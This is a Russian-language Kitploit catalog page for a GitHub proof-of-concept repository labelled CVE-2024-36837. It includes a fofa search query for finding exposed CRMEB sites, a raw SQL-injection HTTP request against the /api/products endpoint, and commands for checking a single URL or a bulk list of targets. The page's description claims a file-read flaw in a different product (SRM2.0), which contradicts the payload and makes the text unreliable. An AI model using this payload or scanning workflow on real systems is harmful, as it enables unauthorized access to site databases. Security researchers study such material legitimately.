Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36837 — CVE-2024-36837 POC | Kitploit
Инструменты/GitHubGitHub/lhc321-source/cve-2024-36837
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 POC

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

README.md

#CVE-2024-36837

Отказ от ответственности

#В интерфейсе runtimeLog/download системы SRM2.0 от ZhiLianYunCai существует уязвимость произвольного чтения файлов. Неаутентифицированный злоумышленник может через эту уязвимость читать важные системные файлы (например, файлы конфигурации базы данных, системные конфигурации) и файлы конфигурации базы данных, что приводит к крайне небезопасному состоянию сайта.

Синтаксис fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip

Добавьте http:// или https:// перед URL

python 11.py

#Как использовать python cve.py -h

#Массовая проверка URL-адреса в url.txt должны содержать http:// или https:// python cve.py -f url.txt

#Одиночная проверка URL-адрес должен содержать http:// или https:// python cve.py -u url

Скачать инструмент